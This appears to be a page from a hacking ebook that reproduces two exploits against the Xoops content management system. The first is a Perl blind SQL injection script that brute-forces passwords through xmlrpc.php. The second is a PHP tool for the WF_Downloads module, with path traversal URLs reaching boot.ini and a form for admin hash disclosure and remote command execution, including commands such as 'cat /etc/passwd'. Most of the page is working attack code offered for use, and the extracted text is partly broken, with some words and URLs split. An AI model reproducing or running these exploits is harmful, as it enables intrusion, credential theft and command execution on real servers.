Hacker Professional Ebook part 440 ppsx

$data = '<?xml version="1.0"?>'; $data .= '<methodCall>'; $data .= '<methodName>blogger.getUsersBlogs</methodName>'; $data .= '<params>'; $data .= '<param>'; $data .= '<value><string></string></value>'; $data .= '</param>'; $data .= '<param>'; $data .= '<value><string>'.$name.'\' AND ascii(substring(pass,'.$s_num.',1))'.$ccheck.')/*</string></value>'; $data .= '</param>'; $data .= '</params>'; $data .= '</methodCall>'; $req = new HTTP::Request 'POST' => $url; $req->content_type('application/xml'); $req->content($data); $ua = new LWP::UserAgent; $res = $ua->request($req); $reply= $res->content; if($reply =~ /Selected blog application does not exist/) { print "\n [-] NEWS BLOG DOES NOT EXIST =(\n [-] EXPLOIT FAILED!\n"; exit(); } if($reply =~ /User authentication failed/) { return 0; } else { return 1; } } sub status() { $status = $n % 5; if($status==0){ print "\b\b/]"; } if($status==1){ print "\b\b-]"; } if($status==2){ print "\b\b\\]"; } if($status==3){ print "\b\b|]"; } } sub usage() { &head; print q( USAGE: r57xoops.pl [OPTIONS] OPTIONS: -u [url] - path to xmlrpc.php -n [USERNAME] - user for bruteforce E.G. r57xoops.pl -u http://server/xoops/xmlrpc.php -n admin (c)oded by 1dt.w0lf RST/GHC , http://rst.void.ru , http://ghc.ru ); exit(); } sub head() { print q( Xoops <= 2.0.11 xmlrpc.php sql injection exploit by RST/GHC ); } Xoops (wfdownloads) 2.05 Module Multiple Vulnerabilities Exploit Code: <?php /* rgod: http://[target]/[path_to_xoops]/class/xoopseditor/textarea/editor_registry.php?xoop sConfig[language]= / / / / / / / / / /script http://[target]/[path_to_xoops]/class/xoopseditor/textarea/editor_registry.php?xoop sConfig[language]= / / / / / / / / / /boot.ini%00 http://[target]/[path_to_xoops]/class/xoopseditor/koivi/editor_registry.php?xoopsC onfig[language]= / / / / / / / / / /script http://[target]/[path_to_xoops]/class/xoopseditor/koivi/editor_registry.php?xoopsC onfig[language]= / / / / / / / / / /boot.ini%00 http://[target]/[path_to_xoops]/class/xoopseditor/dhtmltextarea/editor_registry.php ?xoopsConfig[language]= / / / / / / / / / /script http://[target]/[path_to_xoops]/class/xoopseditor/dhtmltextarea/editor_registry.php ?xoopsConfig[language]= / / / / / / / / / /boot.ini%00 added for future reference /str0ke */ # XOOPS_WFd205_xpl.php 11.35 12/11/2005 # # # # XOOPS WF_Downloads Module v 2.05 SQL injection / # # Admin credentials disclosure & remote commands execution all-in-one # # by rgod # # site: http://rgod.altervista.org # # # # usage: launch from Apache, fill in requested fields, then go! # # # # make these changes in php.ini if you have troubles # # with this script: # # allow_call_time_pass_reference = on # # register_globals = on # # # # Sun-Tzu: "Indirect tactics, efficiently applied, are inexhausible as Heaven # # and Earth, unending as the flow of rivers and streams; like the sun and # # moon, they end but to begin anew; like the four seasons, they pass away to # # return once more. # error_reporting(0); ini_set("max_execution_time",0); ini_set("default_socket_timeout", 2); ob_implicit_flush (1); echo'<html><head><title>XOOPS WF_Downloads module 2.05 SQL Injection </title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <style type="text/css"> body { background-color:#111111; SCROLLBAR-ARROW- COLOR:#ffffff; SCROLLBAR-BASE-COLOR: black; CURSOR: crosshair; color: #1CB081; } img {background-color: #FFFFFF !important} input {background-color: #303030 !important} option { background-color: #303030 !important} textarea {background-color: #303030 !important} input {color: #1CB081 !important} option {color: #1CB081 !important} textarea {color: #1CB081 !important} checkbox {background-color: #303030 !important} select {font-weight: normal; color: #1CB081; background-color: #303030;} body {font-size: 8pt !important; background-color: #111111; body * {font-size: 8pt !important} h1 {font-size: 0.8em !important} h2 {font-size: 0.8em !important} h3 {font-size: 0.8em !important} h4,h5,h6 {font-size: 0.8em !important} h1 font {font-size: 0.8em !important} h2 font {font-size: 0.8em !important}h3 font {font-size: 0.8em !important} h4 font,h5 font,h6 font {font-size: 0.8em !important} * {font-style: normal !important} *{text-decoration: none !important} a:link,a:active,a:visited { text-decoration: none ; color : #99aa33; } a:hover{text-decoration: underline; color : #999933; } .Stile5 {font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px; } .Stile6 {font-family: Verdana, Arial, Helvetica, sans-serif; font-weight:bold; font-style: italic;} ></style></head><body><p class="Stile6"> XOOPS WF_Downloads module 2.05 SQL Injection </p><p class=" Stile6">a script by rgod at <a href="http://rgod.altervista.org"target="_blank"> http://rgod.altervista.org</a></p><table width="84%"><tr><td width="43%"> <form name="form1" method="post" action="'.$SERVER[PHP_SELF].'?path=value&host= value&port=value&command=value&proxy=value&action=value"><p><input type="text" name="host"> <span class="Stile5"> * hostname (ex: www.sitename.com) </span></p> <p><input type="text" name="path"><span class="Stile5"> * path ( ex: /xoops/ or just / )</span></p><p><input type="text" name="username"><span class="Stile5"> * username</span></p><p><input type="text" name="password"><span class="Stile5"> * and password, to retrieve a session cookie</span> </p> <p><input type="text" name="action"><span class="Stile5"> * action: "HASH" to disclose admin loginname & MD5 password hash, "CMD" to launch commands </span> </p><p> <input type="text" name="pathtoWWW"><span class="Stile5">path to WWW ftom Mysql directory,need this for " INTO OUTFILE " statement (default: / /www) </span></p><p> <input type="text" name="table_prefix"> <span class="Stile5"> specify a table prefix other than the default (fXZtr_)</span></p><p><input type="text" name="port"> <span class="Stile5">specify a port other than 80 (default value)</span> </p><p> <input type="text" name="command"> <span class="Stile5">a Unix command, example: ls -la to list directories, cat /etc/passwd to show passwd file, cat ./ /mainf ile.php to see database username and password</span></p><p><input type="text" name="proxy"> <span class="Stile5"> send exploit through an HTTP proxy (ip:port) </span></p><p><input type="submit"name="Submit" value="go!"> </p> </form> </td> </tr></table></body></html>'; function show($headeri) { $ii=0; $ji=0; $ki=0; $ci=0; echo '<table border="0"><tr>'; while ($ii <= strlen($headeri)-1) { $datai=dechex(ord($headeri[$ii])); if ($ji==16) { $ji=0; $ci++; echo "<td>  </td>"; for ($li=0; $li<=15; $li++) { echo "<td>".$headeri[$li+$ki]."</td>"; } $ki=$ki+16; echo "</tr><tr>"; } if (strlen($datai)==1) {echo "<td>0".$datai."</td>";} else {echo "<td>".$datai."</td> ";} $ii++; $ji++;